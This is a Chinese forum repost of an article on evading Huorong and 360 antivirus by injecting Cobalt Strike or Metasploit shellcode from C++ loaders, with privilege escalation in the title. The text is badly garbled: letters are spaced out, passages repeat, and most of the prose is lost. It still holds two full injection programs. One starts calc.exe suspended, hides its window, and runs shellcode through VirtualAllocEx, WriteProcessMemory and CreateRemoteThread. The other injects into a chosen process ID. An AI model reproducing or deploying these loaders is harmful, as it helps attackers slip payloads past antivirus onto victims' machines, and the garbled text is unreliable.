搜索

[26767] 2021-08-27_shellcode免杀(2)—C++二次内入免杀火绒360并提权

文档创建者:s7ckTeam
浏览次数:242
最后更新:2025-01-19
2021-08-27_shellcode免杀(2)—C++二次内入免杀火绒360并提权 1 2 s h e l l c o d e 2 C + + 3 6 0     m o o n s e c   2 0 2 1 - 0 8 - 2 7   #       , 2 3 s h e l l c o d e 2 C + + 3 6 0 M S F 3 6 0 s h e l l c o d e 1 C 3 6 0 C 3 6 0 C + + m s f 3 6 0 m s f 线
C S c o d e c s 1 . C S 2 . o f f i c e 3 . c s d e f i n e B O O L   i n j e c t i o n s h e l l c o d e T C H A R A N S I 使 " " U n i c o d e 使 L " " S T A R T U P I N F O   s i   ; P R O C E S S _ I N F O R M A T I O N L P V O I D   H A N D L E D W O R D d w E x i t C o d e B O O L F A L S E 0 l p M a l w a r e B a s e A d d r s h e l l c o d e G e t S y s t e m D i r e c t o r y ( C a p p n a m e , M A X _ P A T H ) ; _ t c s c a t ( C a p p n a m e , L " c a l c . e x e " ) ; p r i n t f ( " I n j e c t i o n p r o g r a m   N a m e : % S r n " , C a p p n a m e ) ;
Z e r o M e m o r y C r e a t e P r o c e s s s i p i r e t u r n 0 n u l l h e l l c o d e s h e l l c o d e s h e l l c o d e 线 线 0 a d d r e t ; l p n e w V i c t i m B a s e A d d r =   V i r t u a l A l l o c E x ( p i . h P r o c e s s , N U L L ,   s i z e o f ( s h e l l c o d e )   +   1 ,   M E M _ C O M M I T   | M E M _ R E S E R V E , P A G E _ E X E C U T E _ R E A D W R I T E ) ; W r i t e P r o c e s s M e m o r y ( p i . h P r o c e s s , l p n e w V i c t i m B a s e A d d r , ( L P V O I D ) l p M a l w a r e B a s e A d d r , s i z e o f ( s h e l l c o d e ) + 1 , N U L L ) ; h T h r e a d = C r e a t e R e m o t e T h r e a d ( p i . h P r o c e s s , 0 , 0 , ( L P T H R E A D _ S T A R T _ R O U T I N E ) l p n e w V i c t i m B a s e A d d r , N U L L , 0 , N U L L ) ; W a i t F o r S i n g l e O b j e c t ( p i . h T h r e a d , I N F I N I T E ) ;     G e t E x i t C o d e P r o c e s s ( p i . h P r o c e s s , & d w E x i t C o d e ) ;     T e r m i n a t e P r o c e s s ( p i . h P r o c e s s , 0 ) ; r e t u r n   b R
3 4 s h e l l c o d e s h e l l c o d e s h e l l c o d e s h e l l c o d e s h e l l c o d e s h e l l c o d e C S s h e l l p i d p i d m s f
p i d p i d p i d m s f m s f ,
姿 C S s h e l l c o d e # d e f i n e     _ C R T _ S E C U R E _ N O _ W A R N I N G S # i n c l u d e   < W i n d o w s . h > # i n c l u d e < s t d i o . h > # i n c l u d e   < t c h a r . h > # i n c l u d e   " i o s t r e a m " u s i n g   n a m e s p a c e   s t d ; u n s i g n e d   c h a r   s h e l l c o d e [ ]   =   " " ; / / M S F s h e l l c o d e B O O L   i n j e c t i o n ( ) {         T C H A R   C a p p n a m e [ M A X _ P A T H ]   =   {   0   } ;         S T A R T U P I N F O   s i ;         P R O C E S S _ I N F O R M A T I O N   p i ;         L P V O I D   l p M a l w a r e B a s e A d d r ;         L P V O I D   l p n e w V i c t i m B a s e A d d r ;         H A N D L E   h T h r e a d ;         D W O R D   d w E x i t C o d e ;         B O O L   b R e t   =   F A L S E ;         l p M a l w a r e B a s e A d d r   =   s h e l l c o d e ;         G e t S y s t e m D i r e c t o r y ( C a p p n a m e ,   M A X _ P A T H ) ;         _ t c s c a t ( C a p p n a m e ,   L " c a l c . e x e " ) ;         p r i n t f ( " I n j e c t i o n   p r o g r a m   N a m e : % S r n " ,   C a p p n a m e ) ;         Z e r o M e m o r y ( & s i ,   s i z e o f ( s i ) ) ;         s i . c b   =   s i z e o f ( s i ) ;         Z e r o M e m o r y ( & p i ,   s i z e o f ( p i ) ) ;         i f   ( C r e a t e P r o c e s s ( C a p p n a m e ,   N U L L ,   N U L L ,   N U L L ,                 F A L S E ,   C R E A T E _ S U S P E N D E D                 ,   N U L L ,   N U L L ,   & s i ,   & p i )   = =   0 )         {                 r e t u r n   b R e t ;         }         l p n e w V i c t i m B a s e A d d r   =   V i r t u a l A l l o c E x ( p i . h P r o c e s s                 ,   N U L L ,   s i z e o f ( s h e l l c o d e )   +   1 ,   M E M _ C O M M I T   |   M E M _ R E S E R V E ,                 P A G E _ E X E C U T E _ R E A D W R I T E ) ;         i f   ( l p n e w V i c t i m B a s e A d d r   = =   N U L L )         {                 r e t u r n   b R e t ;         }         W r i t e P r o c e s s M e m o r y ( p i . h P r o c e s s ,   l p n e w V i c t i m B a s e A d d r ,                 ( L P V O I D ) l p M a l w a r e B a s e A d d r ,   s i z e o f ( s h e l l c o d e )   +   1 ,   N U L L ) ;         h T h r e a d   =   C r e a t e R e m o t e T h r e a d ( p i . h P r o c e s s ,   0 ,   0 ,
5 线           h T h r e a d   =   C r e a t e R e m o t e T h r e a d ( p i . h P r o c e s s ,   0 ,   0 ,                 ( L P T H R E A D _ S T A R T _ R O U T I N E ) l p n e w V i c t i m B a s e A d d r ,   N U L L ,   0 ,   N U L L ) ;         W a i t F o r S i n g l e O b j e c t ( p i . h T h r e a d ,   I N F I N I T E ) ;         G e t E x i t C o d e P r o c e s s ( p i . h P r o c e s s ,   & d w E x i t C o d e ) ;         T e r m i n a t e P r o c e s s ( p i . h P r o c e s s ,   0 ) ;         r e t u r n   b R e t ; } v o i d   h e l p ( c h a r *   p r o c ) {         p r i n t f ( " % s : [ - ]   n s t a r t   a   p r o c e s s   a n d   i n j e c t i o n   s h e l l c o d e   t o   m e m o r y r n " ,   p r o c ) ; } i n t   m a i n ( i n t   a r g c ,   c h a r *   a r g v [ ] ) {         H W N D   h w n d D O S   =   G e t F o r e g r o u n d W i n d o w ( ) ;   / /         S h o w W i n d o w ( h w n d D O S ,   S W _ H I D E ) ;   / /         h e l p ( a r g v [ 0 ] ) ;         i n j e c t i o n ( ) ;         r e t u r n   0 ; } # d e f i n e   _ C R T _ S E C U R E _ N O _ W A R N I N G S # i n c l u d e   < w i n d o w s . h > # i n c l u d e   < s t d l i b . h > # i n c l u d e < s t d i o . h > u n s i g n e d   c h a r     S h e l l C o d e [ ]   =   " " ; i n t   m a i n ( ) {     H A N D L E   H a n d l e ;     H A N D L E   r e m o t e T h r e a d ;     P V O I D   r e m o t e B u f f e r ;     D W O R D   P i d ;     P i d   =   ;             H a n d l e   =   O p e n P r o c e s s ( P R O C E S S _ A L L _ A C C E S S ,   F A L S E ,   P i d ) ;     r e m o t e B u f f e r   =   V i r t u a l A l l o c E x ( H a n d l e ,   N U L L ,   s i z e o f ( S h e l l C o d e ) ,   ( M E M _ R E S E R V E   |   M E M _ C O M M I T ) ,   P A G E _ E X E C U T E _ R E A D W R I T E ) ;     W r i t e P r o c e s s M e m o r y ( H a n d l e ,   r e m o t e B u f f e r ,   S h e l l C o d e ,   s i z e o f ( S h e l l C o d e ) ,   N U L L ) ;     r e m o t e T h r e a d   =   C r e a t e R e m o t e T h r e a d ( H a n d l e ,   N U L L ,   0 ,   ( L P T H R E A D _ S T A R T _ R O U T I N E ) r e m o t e B u f f e r ,   N U L L ,   0 ,   N U L L ) ;     C l o s e H a n d l e ( H a n d l e ) ;     r e t u r n   0 ; }

回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理